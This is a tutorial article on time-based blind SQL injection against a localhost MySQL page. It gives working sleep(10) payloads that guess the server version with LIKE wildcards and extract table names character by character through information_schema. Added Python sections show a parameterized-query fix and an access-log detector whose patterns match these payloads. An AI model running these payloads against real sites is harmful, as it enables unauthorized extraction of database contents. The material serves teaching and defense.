fast Blind SQL injection exploitation
Here is the faster method for time-based blind SQL injection.
It's not just a tut, it's an article with explanation. If you believe in
'CTRL+c, CTRL+v' leave from here immediately :P
So let's grab the version first by using wildcard characters.
Payload is
and (select sleep(10) from dual where version() like 'number.number%')--+
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like 'number.number%')--+
Here number.number is the number in the SQL server version,
like my SQL server version is 5.5.8.
Let's assume I don't know the version of the SQL server :P
How to find it?? Simple:
using like and a wildcard will own the SHIT :D
The payload that we have to use should be like this
like 'number%'
means
we have to place a number and check the response of the server.
If the number is correct, the SQL server will sleep and you will get a late response, else
the page will load without delay.
Like, my SQL server version is 5.5.8,
so I will guess the first character of the SQL server version like this
like '5%' (for SQL server version 5)
and the injected URL will be like this
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like '5%')--+
or
like '4%' (for SQL server version 4)
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like '4%')--+
According to the above payloads, check whether the first character of the SQL server version
is 5 or 4:
if the SQL server version is 5.x.x, the first payload will work;
if the SQL server version is 4.x.x, the second payload will work.
After successfully guessing the first character, we need to guess the next character.
For that, place . and then a number from 0 to 9,
means,
like '5.1%'
like '5.2%'
like '5.3%'
like '5.4%'
like '5.5%'
like '5.6%'
like '5.7%'
like '5.8%'
Start placing payloads; if the next character of the version matches, the page will respond
late.
As my SQL server version is 5.5.8, when I place like '5.5%' in the payload
the page will respond late.
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like '5.1%')--+
This will result in a quick page load, because the SQL server version is 5.5.8 and
according to the payload we are checking whether the first 3 characters are 5.1 or not.
This payload will work, because we are checking whether the starting 3 characters are
5.5 or not (SQL server version is 5.5.8):
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like '5.5%')--+
So, now guess the next character. Try to figure out whether the next character is . or
some number:
http://127.0.0.1/sqli/index.php?id=1 and (select sleep(10) from dual where version() like '5.5.%')--+
If the above URL responds late, it means the starting 4 characters are 5.5.
Else place a number instead of . in the fourth position:
like '5.50%'
like '5.51%'
like '5.52%'
like '5.53%'
like '5.54%'
like '5.55%'
like '5.56%'
like '5.57%'
like '5.58%'
So you can find out the correct version of the SQL server using this approach.
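Why the trick works is worth seeing beside its fix. The added Python example below (written for this article, not code from the original author) rebuilds the page's `index.php?id=1` lookup on an in-memory SQLite database in two forms: the vulnerable one that concatenates the id into the statement, so the appended `and (select ...)` condition becomes part of the WHERE clause, and the hardened one that validates the type and binds the value as a parameter. SQLite has no `sleep()`, `version()` or `dual`, so the injected condition uses `sqlite_version() LIKE` and the true/false outcome is read from the row count instead of a delay; on MySQL that true branch is exactly what runs `sleep(10)`. The table name, column names and sample rows are constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the page's /sqli/index.php?id=1 lookup.
# Example code, not from the original article. sqlite3 has no sleep(),
# version() or dual, so the injected condition tests sqlite_version() LIKE
# and the outcome is read from the row count instead of a delay.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """Builds the statement by string concatenation, as the page's target does.
    Everything after the number becomes SQL syntax, so 'and (select ...)' is
    evaluated as part of the WHERE clause."""
    sql = "SELECT name FROM products WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    The driver sends it as data, never as SQL text, so no appended condition
    can change the query's meaning."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []  # not a valid id: reject instead of interpolating it
    rows = conn.execute("SELECT name FROM products WHERE id=?", (id_value,))
    return [row[0] for row in rows]


def version_prefix_matches(conn, guess_prefix):
    """The page's LIKE-prefix condition evaluated through the vulnerable lookup.
    True when the injected condition held (the row came back), False when it
    failed (no rows). On MySQL the true branch is what runs sleep(10)."""
    injected = "1 and (sqlite_version() like '%s')" % guess_prefix
    return len(lookup_vulnerable(conn, injected)) == 1


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, '3.%':", version_prefix_matches(db, "3.%"))  # True on any SQLite 3.x
    print("vulnerable, '4.%':", version_prefix_matches(db, "4.%"))  # False
    print("safe, injected id:",
          lookup_safe(db, "1 and (sqlite_version() like '3.%')"))  # []
```

The difference between the two lookups is the whole mitigation: with a bound parameter the same input is compared as a value and simply matches nothing, so neither the row count nor the response time carries any information about the database.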
Now next: to find out table names from the database >:D<
I am gonna use a payload which works by checking the decimal (ASCII) value of the table name's
characters.
Means, if there is a table named admin, it has 5 characters and
the first character is a, whose decimal value is 97,
the second character is d, whose decimal value is 100,
the third character is m, whose decimal value is 109,
the fourth character is i, whose decimal value is 105,
the fifth character is n, whose decimal value is 110.
and (select sleep(10) from dual where ascii(substring((SELECT table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))</>/=dec_value)--+
(use one of <, > or = in place of </>/= to compare the character's value with dec_value)
Let's break this payload into parts and see what it is actually doing :P
Query which finds the "name of first table" in the current database:
SELECT table_name from information_schema.tables where table_schema=database() limit 0,1
For finding the next table name keep changing the limit clause value from 0,1 to 1,1 (for the
2nd table), 2,1 (for the third table), 3,1 (for the fourth table) and so on.
Finding the decimal value of a specific character of the table name:
ascii(substring((SELECT table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))
This is like
substring((query to find table name),1,1)
The working of this payload actually is: find the table name and then select a
particular character from it.
Means, suppose the first table in the database is admin, which is returned by the query
SELECT table_name from information_schema.tables where table_schema=database() limit 0,1
Now the substring function will grab a character from that name like
substring((query to find table name),1,1)
In the above example substring is retrieving the first character of the table name which
is returned by the query SELECT table_name from information_schema.tables where table_schema=database() limit 0,1
Change the value from 1,1 to 2,1 for grabbing the next character of the table name and so
on :)
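The probes described above are noisy from the server's side: every true branch holds a request open for the full `sleep(10)`, and extracting one table name takes dozens of near-identical requests from the same client. The added Python example below (not part of the original article) shows what that looks like in an access log. It scans a few constructed Apache-style lines, assumed here to carry a trailing `%D` response-time field in microseconds, URL-decodes each query string (the `+` in the page's `--+` terminator decodes to a space), matches the indicators the page's own payloads contain, attaches the observed response time, and counts flagged requests per source address. The IP addresses, timestamps and paths are made up for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access log: Apache combined format plus a trailing %D
# response time in microseconds. Made up for this example; the three probe
# lines reuse the page's payloads, URL-encoded the way a browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 2310
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/index.php?id=1%20and%20(select%20sleep(10)%20from%20dual%20where%20version()%20like%20'5%25')--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0" 10004873
10.0.0.9 - - [01/Jan/2024:10:00:13 +0000] "GET /sqli/index.php?id=1%20and%20(select%20sleep(10)%20from%20dual%20where%20version()%20like%20'4%25')--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0" 3102
10.0.0.9 - - [01/Jan/2024:10:00:14 +0000] "GET /sqli/index.php?id=1%20and%20(select%20sleep(10)%20from%20dual%20where%20ascii(substring((SELECT%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=97)--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0" 10003991
10.0.0.7 - - [01/Jan/2024:10:00:15 +0000] "GET /search.php?q=sleeping%20bags HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 1870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) \S+ "[^"]*" "[^"]*" (?P<us>\d+)$'
)

# Indicators taken from the payloads shown on the page, matched after decoding.
INDICATORS = [
    ("sleep_call", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark_call", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("from_dual", re.compile(r"\bfrom\s+dual\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("char_extraction", re.compile(r"\bascii\s*\(\s*substr", re.I)),
    ("comment_terminator", re.compile(r"--[ +]")),
]


def decode_fully(s, max_rounds=3):
    """Undo URL encoding repeatedly so double encoding and '+' (the reason the
    page's payloads end in '--+') do not hide keywords from the patterns."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse(log_text, slow_ms=5000.0):
    """Return one finding per request whose decoded query string carries
    time-based blind SQLi indicators, with the observed response time."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_fully(m["path"])
        hits = [name for name, rx in INDICATORS if rx.search(decoded)]
        if not hits:
            continue
        elapsed_ms = int(m["us"]) / 1000.0
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "indicators": hits,
            "elapsed_ms": elapsed_ms,
            "slow": elapsed_ms >= slow_ms,
            # an explicit delay primitive is the strongest single signal
            "confidence": "high" if ("sleep_call" in hits or "benchmark_call" in hits) else "medium",
        })
    return findings


def suspicious_clients(findings, min_requests=2):
    """Blind extraction needs many probes per secret, so count flagged
    requests per source address and report the repeat offenders."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= min_requests}


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["ts"], f["confidence"], f["elapsed_ms"], f["indicators"])
    print("clients with repeated probes:", suspicious_clients(results))
```

Two things the sample is built to show: the `sleeping bags` search is not flagged because the pattern requires `sleep(`, and the second probe (`'4%'`) returned in a few milliseconds yet is still flagged, since a failed guess is as much evidence of probing as a successful one; the slow/fast pairing across the same client is the fingerprint of the technique the article describes.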